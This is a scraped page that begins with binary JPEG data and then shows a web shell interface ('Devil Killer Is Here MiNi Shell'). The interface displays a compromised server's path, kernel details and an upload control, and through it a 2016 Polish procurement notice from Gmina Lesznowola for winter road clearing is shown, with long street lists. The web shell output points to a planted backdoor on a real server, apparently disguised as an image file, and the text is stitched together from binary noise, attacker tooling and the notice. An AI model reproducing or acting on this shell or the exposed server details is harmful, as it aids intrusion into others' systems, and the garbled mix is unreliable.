JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161124/350441-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='Urząd Gminy Lesznowola, ul. Gminnej Rady Narodowej 60, 06-506 Lesznowola ' target='_blank'>Urząd Gminy Lesznowola, ul. Gminnej Rady Narodowej 60, 06-506 Lesznowola </a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 350441 - 2016
              z dnia 2016-11-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Lesznowola: Zimowe utrzymanie dróg gminnych na terenie Gminy Lesznowola w roku 2017<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Lesznowola, krajowy numer identyfikacyjny
              53901200000, ul.
              ul. Gminnej Rady Narodowej 
              60,
              05506  
              Lesznowola, woj.
              mazowieckie, państwo
              Polska, tel.
              022 7579340 do42 wew. 113, e-mail
              , faks
              227 579 270.
              <br />
              Adres strony internetowej (URL): www.lesznowola eobip.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />www.lesznowola.eobip.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />Urząd Gminy Lesznowola, ul. Gminnej Rady Narodowej 60, 06-506 Lesznowola </div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zimowe utrzymanie dróg gminnych na terenie Gminy Lesznowola w roku 2017<br /><b>Numer referencyjny: </b>RZP 271.5.09.01.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zimowe utrzymanie dróg gminnych na terenie Gminy Lesznowola w roku 2017
 Opis przedmiotu i zakresu zamówienia.
a)Likwidacja śliskości ( drogi I i II kolejności odśnieżania 88,75 km.) + parkingi  13 450m2, obejmująca posypywanie solą - 30g/m2. 
b)Płużenie (drogi I i II kolejności odśnieżania 88,75 km.) + parkingi  13450m2. 
c)Płużenie (drogi III kolejności odśnieżania 59,18 km ). Czas wykonania usługi  max. 6 h od zgłoszenia przez Zamawiającego. 
d)Likwidacja śliskości (zgłoszenia interwencyjne), obejmująca posypywanie mieszanką piaskowo-solną 50% - 50g/m2. 
e)Płużenie (zgłoszenia interwencyjne) . 
f)Likwidacja śliskości (zgłoszenia interwencyjne), 
gLikwidacja śliskości (zgłoszenia interwencyjne), 
h)Odśnieżanie oraz likwidacja śliskości na chodnikach i ścieżkach pieszo-rowerowych, obejmujące posypywanie mieszanką piaskowo-solną 50% 

Zamawiający dokonuje zgłoszenia robót drogą elektroniczną, faksem lub telefonicznie.
Wykonawca powiadamia Zamawiającego o każdorazowym rozpoczęciu i zakończeniu prac.

Zakres zamówienia obejmuje wykonanie w/w czynności na następujących ulicach i drogach:
WYKAZ DRÓG WEDŁUG I, II i III KOLEJNOŚCI ODŚNIEŻANIA NA TERENIE GMINY LESZNOWOLA W ROKU 2017.
UWAGI:
Drogi wzdłuż których jest chodnik lub ścieżka pieszo-rowerowa należy odśnieżać na stronę przeciwną.
Na terenie Gminy Lesznowola znajdują się drogi o szerokości do 3 m oraz drogi bez przejazdu tzw. ślepe.

DROGI W/G PIERWSZEJ KOLEJNOŚCI ODŚNIEŻANIA:
    I)   MROKÓW
- ul. Szkolna  1,8km,
- ul. Legionów  0,4km,
- ul. Górskiego  0,2km,
- parking przy ul. M. Świątkiewicz (vis a vis straży)  1500m2;

   II)  STEFANOWO
- ul. Urocza  2,0km,
- ul. Malinowa  2,0km,
- ul. Graniczna (od ul. Ułanów do ul. Malinowej)  1,07 km,

   III)  MARYSIN
- ul. Ludowa i ul. Zdrowotna  1,5 km,
- ul. Lazurowa  0,4km,

   IV)  ŁAZY
- ul. Ks. Słojewskiego ( progi )  1,6km,
- ul. Łączności ( progi )  1,0km,
- ul. Podleśna  1,9km,
- ul. Rolna i ul. Lipowa ( progi )  1,5km,
- parking ul. Ks. Słojewskiego  3600m2;

   V)  MAGDALENKA
- ul. Lipowa ( progi )  1,1km,
- ul. Sosnowa ( progi ) -  0,8km,
- ul. Jarzębinowa ( progi )  0,8km,
- ul. Leśna ( progi )  1,7km,
- ul. Brzozowa i ul. Parkowa (progi )  1,0km,
- ul. Środkowa (progi )  0,5km,
- ul. Jesionowa  1,04 km,

   VI)  LESZNOWOLA
- ul. Żytnia  1,8km,
- ul. GRN  1,0km,
- ul. Poprzeczna  1,2km,
- ul. Końcowa ( od Słonecznej do Leśnej )  0,2km,
- parking ul. Szkolna ( przy szkole )  4 000 m2

   VII)  MYSIADŁO
- ul. Graniczna ( progi )  1,0km,
- ul. Topolowa i ul. Wierzbowa( progi )  0,7km,
- ul. Topolowa  nowa  0,22km;
- droga od ul. Puławskiej do ul. Topolowej  0,8km;
- droga od ul. Topolowej do ul. Kwiatowej  0,28km;
- ul. Zakręt ( progi )  1,0km,
- ul. Wiejska ( progi )  0,7km,
- ul. Kuropatwy ( progi )  1,1km,
- ul. Osiedlowa ( od Puławskiej i od Różanej ) ( progi )  0,5km,
- ul. Krótka ( progi )  0,2km,
- ul. Geodetów  0,5km,
- ul. Okrąg ( progi )  1,0km + teren pomiędzy garażami  0,28km,
- ul. Różana ( progi )  0,4km,
- ul. Polna ( progi )  0,8km,
- ul. Ogrodowa ( progi )  0,8km,
- ul. łączniki (2) pomiędzy ul. Ogrodową i Polną  0,15 km,
- ul. Kwiatowa  0,93 km,
- ul. Borówki  0,6 km,
- parking ul. Topolowa  1800m2,
- parking ul. Topolowa przy rondzie  750m2;

   VIII)  STARA IWICZNA
 - ul. Kielecka ( progi )  0,9km,
-  ul. Słoneczna ( od ul. Mleczarskiej do ul. Nowej ) ( progi )  0,5km,
- ul. Kolejowa  0,33km,

   IX)  NOWA IWICZNA
- ul. Szkolna ( progi )  0,9km,
- ul. Mleczarska  0,6km,
- ul. Różana ( progi )  0,6km,
- ul. Przebiśniegów 0,2km,
- ul. Kielecka  1,07km,
- parking ul. Szkolna / Krasickiego  1800m2;

   X)  WILCZA GÓRA
-ul. Przyleśna (od ul. Postępu do ul. Wojska Polskiego)  1,6 km,

   XI)  PODOLSZYN
- ul. Polna  1,6km,
- ul. Zielona  0,36 km,

   XII)  WARSZAWIANKA
- ul. Brzozowa i ul. Krótka  1,1km,

  XIII) ZAMIENIE
- ul. Zakładowa (od ul. Dawidowskiej do ul. Zakładowej)  0,21 km,
- ul. Błędna (kostka)  0,84 km,
- ul. Arakowa  0,95 km,
- ul. Waniliowa  0,66 km,

  XIV) KOSÓW
- ul. Karasia (od ul. Nadrzecznej)  0,25 km,

  XV) ŁOZISKA
- ul. Fabryczna ( progi )  ( od ul. Postępu do ul. Kolejowej )  2,56km,

  XVI) ZGORZAŁA
- ul. Kukułki i Wilgi  0,49km;

DROGI WG DRUGIEJ KOLEJNOŚCI ODŚNIEŻANIA:
   I)  MROKÓW
- ul. Sadowa  1,9 km,
- ul. Karasia (od ul. Szkolnej do ul. Sadowej)  0,5km,

   II)  ŁAZY
- ul. Wiejska  1,5km,
- ul. Polna  0,6km,
- ul. Przyjazna (na osiedlu)  0,15 km,
- ul. Rolna  1,3km,
- ul. Kwiatowa  1,0km,
- ul. Wąska  0,9km,
- ul. Jasna  0,7km,
- ul. Bursztynowa (od ul. Jasnej do ul. Brylantowej)  0,1km,
- ul. Sosnowa, ul. Różana, ul. Masztowa, ul. Irysowa  0,8km,
- ul. Projektowana, ul. Mała, ul. Środkowa, ul. Skrajna  0,4km,
- ul. Cicha  1,0km,
- ul. Spokojna 0,75 km, 
- ul. Szmaragdowa, ul. Marzeń  054 km, 
- ul. Familijna  0,39 km  

   III)  MAGDALENKA
- ul. Graniczna i Olchy ( odcinek w kostce)  0,33 km,
- ul. Bukowa  0,37 km,
- ul. Leszczynowa  0,38 km,
- ul. Głogowa  0,33 km,
- ul. Jodłowa (utwardzona)  0,22 km,
- ul. Grabowa (utwardzona)  0,23 km,
- ul. Czeremchowa (utwardzona)  0,14 km,
- ul. Jaworowa (od ul. Czeremchowej)  0,23 km,
- ul. Okrężna  0,8km;
- ul. Jałowcowa  0,85 km,
- ul. Polna  0,9 km,
- ul. Modrzewiowa  0,8 km,

   IV)  LESZNOWOLA
- ul. Okrężna  1,3km,
- ul. Polna  0,4km,
- ul. Biedronki + ul. Cykady 50m  0,65km,
- ul. Zajączka, ul. Żubra, ul. Niedźwiedzia  0,56 km,
- ul. Rysia  0,08 km,
- ul. Sportowa i Orna  do końca zabudowań  0,39 km,

   V)  MYSIADŁO
- ul. Poprzeczna (w kostce)  0,3km, 
- ul. Truskawkowa  0,14 km,
- ul. Aronii  0,2 km,
- ul. Agrestowa  0,16 km,
- ul. Porzeczkowa  0,17 km,

   VI)  STARA IWICZNA
- ul. Krótka, ul. Cicha i ul. Niecała  0,48 km,
- ul. Wiśniowa i Syna Pułku  0,75km
- ul. Mała  0,13 km,

   VII)  NOWA IWICZNA
- ul. Migdałowa ( progi )  0,6km,
- ul. Torowa ( progi )  0,5km,
- ul. Tarniny ( progi )  0,4km,
- ul. Poziomki ( progi )  0,4km,
- ul. Zimowa ( od ul. Szkolnej i od ul. Mleczarskiej )  0,6 km,
- ul. Zimowa (wzdłuż osiedla pomiędzy słupkami, wjazd od ul. Spacerowej)  0,16 km,
- ul. Cicha ( progi )  0,4km,
- ul. Willowa  0,35km
- ul. Cisowa ( progi )  0,3km,
- ul. Wiosenna  0,4km,
- ul. Spacerowa (od ul. Wiosennej do ul. Jesiennej)  0,12 km,
- ul. Brzozowa ( progi )  0,2km,
- ul. Modrzewiowa ( progi )  0,3km,
- ul. Stokrotki  0,5km,
- ul. boczna od Granicznej vis a vis ul. Kwiatowej (do ul. Wiosennej)  0,25 km,
- ul. Gimnazjalna  0,15 km,
- ul. Niezapominajki  0,38 km,
- ul. Przebiśniegów  0,29 km,
- ul. Piękna  0,48 km,
- Al. Zgody  0,45 km,

   VIII)  WILCZA GÓRA
- ul. Jasna  0,8km,

  IX) ZAMIENIE
- ul. Zachodnia  0,19 km,
- ul. Główna  0,15 km,
- ul. Cynamonowa  0,16 km,

  X) NOWA WOLA
- ul. Plonowa (od ul. Krasickiego do ul. Maciejki)  0,93 km,
- ul. Malwy  0,07 km,
- ul. Maciejki  0,07 km,

XI) KOLONIA MROKOWSKA 
- ul. boczna od ul. Rejonowej (za kościołem do przedszkola)  0,19 km,

XII) WŁADYSŁAWÓW
- ul. Zielona  1,1 km,

DROGI TRZECIEJ KOLEJNOŚCI ODŚNIEŻANIA
I) MYSIADŁO
- ul. Słowicza  0,09 km,
- ul. Sporna  0,08 km,
- ul. Goździków  0,1 km,
- ul. Lipowa  0,09 km,
- ul. Miła  0,17 km,

II) NOWA IWICZNA
- ul. Kwiatowa  0,2 km,
- ul. Klonowa  0,12 km,
- ul. Spacerowa (od ul. Mleczarskiej)  0,17 km,
- ul. Owocowa  0,12 km,
- ul. Świerkowa  0,16 km,
- ul. Jarzębinowa  0,3 km,
- ul. Dzika  - 0,18 km,
- ul. Poziomki  0,26 km,
- ul. Czereśniowa  0,17 km,
- ul. Sadowa  0,52 km,
- ul. boczna od ul. Krasickiego (przy nr 42-44)  0,14 km,

III) STARA IWICZNA
- ul. Rekreacyjna  0,12 km,
- ul. Urocza  0,2 km,
- ul. Cichy Zakątek  0,21 km,
- ul. boczna od ul. Słonecznej (vis a vis kościoła)  0,28 km,

IV) NOWA WOLA
- ul. Tulipanów  0,07 km,
- ul. Dzikiej Róży  0,7 km,
- ul. Fiołkowa  0,18 km,
- ul. Orna (do końca zabudowań od strony ul. Postępu)  0,3 km,
- ul. Nadarzyńska (od strony ul. Raszyńskiej )  0,18 km,
- ul. Nadarzyńska (od strony ul. Rumiankowej)  0,1 km,
- ul. Krasickiego i Słonecznikowa (do końca zabudowań)  od ul. Szkolnej, nieutwardzone  0,46 km,
- ul. boczna od ul. Szkolnej (przy nr 30 a,b,c)  0,08 km,
- ul. Storczykowa  0,21 km,
- ul. Bławatków  0,09 km,

VI) LESZNOWOLA
- ul. Dworkowa (od ul. Słonecznej do ul. Topolowej)  0,13 km,
- ul. Myszki Polnej (od strony ul. Okrężnej)  0,12 km,
- ul. Borowa (od strony ul. Postępu)  0,82 km,
- ul. Wilcza  0,36 km,
- ul. boczna od ul. Okrężnej przy nr 19  0,33 km,
- ul. Krecia  0,18 km,

VII) JANCZEWICE
- ul. Jaśminowa do nr 9  0,4 km,

VIII) JAZGARZEWSZCZYZNA
- ul. Krzywa  0,46 km,
- ul. Letnia  0,43 km,
- ul. Okrężna  0,4 km,
- ul. Sosnowa  0,2 km,
- ul. Dębowa  0,2 km,
- ul. Wiśniowa (od ul. Skrajnej do ul. Letniej)  0,18 km,
- ul. Podleśna  0,45 km,
- ul. Prosta  0,47 km,
- ul. boczna od ul. Leśnej (przy nr 29)  0,19km,;

IX) WILCZA GÓRA
- ul. Polnego Wiatru  0,42 km,
- ul. Polna  0,7 km,
- ul. Klimka Bachledy  0,3 km,
- ul. Księżycowa  0,26 km,
- ul. Niebiańska  0,29 km,
- ul. Anielska  0,39 km,
- ul. Zaciszna  0,39 km,
- ul. Rajska  0,26 km,
- ul. boczna od ul. Przyleśnej (przy nr 49-51)  0,15 km,
- ul. boczna od ul. Przyleśnej (przy nr 47-49)  0,15 km,

X) WŁADYSŁAWÓW
- ul. Pełni Księżyca (od strony ul. Żwirowej)  0,22 km,
- ul. Porannej Rosy  0,5 km,
- ul. Przedwiośnia  0,4 km,
- ul. Leśnych Ptaków (do końca zabudowań)  0,16 km,
- ul. Cicha (od strony ul. Wojska Polskiego)  0,19 km,
- ul. Piaszczysta  0,34 km,

XI) MAGDALENKA
- ul. Gąsek  0,2 km,
- ul. Konieczna (od strony ul. Gąsek)  0,2 km,
- ul. Graniczna do ul. Olchy (od strony ul. Granicznej  utwardzona)  0,2 km,
- ul. Olchy (od strony ul. Granicznej i od strony ul. Gasek)  0,56 km,
- ul. Ogrodowa  0,43 km,
- ul. Pionierów  0,35 km,
- ul. Wiśniowa  0,29 km,
- ul. Sosnowa (nieutwardzona od strony ul. Lipowej)  0,25 km,
- ul. Wąska  0,37 km,
- ul. Brzozowa (nieutwardzona)  0,82 km,
- ul. ul. Paprociowa  0,85 km,
- ul. Dębowa  0,5 km,
- ul. Akacjowa  0,52 km,
- ul. Klonowa  0,55 km,
- ul. Orzechowa  0,58 km,
- ul. Cicha  0,53 km,
- ul. Świerkowa  0,73 km,
- ul. Kalinowa  0,38 km,
- ul. Kaczeńców  0,53 km,
- ul. Krańcowa  0,36 km,
- ul. Piaskowa  0,37 km,
- ul. Kwiatowa  0,38 km,
- ul. Zielona  0,38 km,
- ul. Wesoła  0,38 km,
- ul. Grójecka  0,38 km,
- ul. Wiązowa (od strony ul. Jałowcowej)  0,12km

XII) ŁAZY
- ul. Wrzosowa  0,73 km,
- ul. Miła  0,19 km,
- ul. Kręta  0,09 km,
- ul. Szklarniowa  0,21 km,
- ul. Skowronka  0,35 km,
- ul. Działkowa  0,14 km,
- ul. Bliska  0,09 km,
- ul. Daleka  0,08 km,
- ul. Dobra  0,27 km,
- ul. Posępna  0,17 km,
- ul. Grażyny  0,09 km
- ul. Tęczowa  0,26 km,
- ul. Krótka  0,17 km,
- ul. Podleśna (nieutwardzona)  0,5 km,
 -ul. Usługowa  0,5 km
- ul. Konwaliowa  0,25 km
- ul. Perłowa  0,7 km
- ul. Gruntowa (od Al. Krakowskiej do ul. Ludowej i od Al. Krakowskiej do końca zabudowań)  1,0 km,
- droga bez nazwy od ul. Wiejskiej do ul. Działkowej  0,24 km,
- ul. boczna od ul. Wiejskiej (vis a vis ul. Jasnej)  0,26 km,
- ul. Boczna  0,4 km,
- ul. boczna od ul. Kwiatowej (dz. nr 480/12)  0,3 km,

XIII) MARYSIN
- ul. Krzywa, ul. Złocista, ul. Pogodna- 0,88 km,
- ul. Góralska  0,17 km,
- ul. Karmazynowa  0,6 km,

XIV) WÓLKA KOSOWSKA
- ul. Melonowa  0,66 km,
- ul. Arbuzowa  0,29 km,
- ul. Żurawinowa  0,27 km,
- ul. boczna od ul. Wesołej (do ujęcia wody)  0,18 km,

XV) KOSÓW
- ul. Dmuchawców- 0,14 km,
- ul. Podleśna  0,5 km,
- ul. Łąkowa  1,03 km,

XVI) MROKÓW
- ul. Żeglarska  0,25 km,
- ul. Górskiego (nieutwardzona)  0,7 km,
- ul. Kościelna  0,3 km,

XVII) WOLA MROKOWSKA
- ul. Wygodna  0,4 km,
- ul. Wąska  0,45 km,
- ul. Łączna  0,4 km,
- ul. Malownicza  0,6 km,
- ul. Krótka (nieutwardzona)  0,2 km,

XVIII) WARSZAWIANKA
- ul. Sielankowa  0,7 km,
- ul. Miodowa  0,3 km,
- ul. Południowa  0,27 km,
- ul. Nutki  0,18 km,
- ul. Alpejska  0,18 km,
- ul. Przyleśna  0,35 km,
- ul. Nastrojowa  0,1 km,

XIX) JASTRZĘBIEC
- ul. Łąkowa  0,22 km,
- ul. Lipowa  0,2 km,
- ul. Ogrodowa  0,2 km,

XX) GARBATKA
- ul. Szeroka (nieutwardzona)  0,6 km,

XXI) STEFANOWO
- ul. Ogrodowa  0,6 km,
- ul. Gen. Skalskiego  0,17 km,
- ul. Polnych Bratków  0,33 km,
- ul. Cicha  0,35 km,
- ul. Leśna  0,3 km,
- ul. Kurpińskiego (plus boczne)  0,43 km,
- ul. Letniskowa  1,18 km,
- ul. Graniczna (od ul. Malinowej do ul. Rejonowej w Woli Mrokowskiej)  2,3 km,
- ul. Jemioły (od strony ul. Ułanów)  0,56 km,

XXII) KOLONIA WARSZAWSKA
- ul. Przezorna  0,6 km,
- ul. Ułanów 27  29  0,42 km,
- ul. Boczna od Al. Krakowskiej (do firmy Plast Service Pack)  0,3 km,

XXIII) ZGORZAŁA
- ul. Wróbelka (od strony ul. Dawidowskiej do końca zabudowań)  0,18 km,
- ul. Wróbelka (od strony ul. Postępu do końca zabudowań)  0,15 km,
- ul. Jaskółki ( do końca zabudowań)  0,17 km,
- ul. Gogolińska + droga boczna przy nr 12  0,24 km,
- ul. Rybitwy  0,2 km,

XXIV) STACHOWO
- ul. Karasia (od ul. Sadowej do asfaltu w Kosowie)  1,75 km,

XXV) ŁOZISKA
- ul. Złotej Jesieni  0,52 km,
- ul. Czterech Wiatrów  0,47 km,
- ul. Kwitnącej Wiśni (od ul. Złotej Jesieni do ul. Złotych Łanów)  0,54 km,
- ul. Złotych Łanów  0,88 km,
- ul. Bajkowa + dojazd od ul. Leśnej  0,19 km.; 

XXVI) JABŁONOWO
- ul. boczna od Al. Krakowskiej (przy CASINO POLAND)  0,22 km,

XXVII) KOLONIA LESZNOWOLA
- ul. Krótka  0,5 km,

XXVIII) ŁAZY PGR I RADIOSTACJA
- ul. boczna od ul. Przyszłości (przy blokach)  0,2 km,
- ul. Przyszłości (od budynku LPK do ul. Perspektywy)  0,14 km,
- ul. Perspektywy  0,15 km,
- ul. Pozytywna  0,14 km,
- ul. Alternatywy (po obu stronach rowu)  0,26 km,

- Pozostałe drogi gminne będą odśnieżane na zgłoszenie.

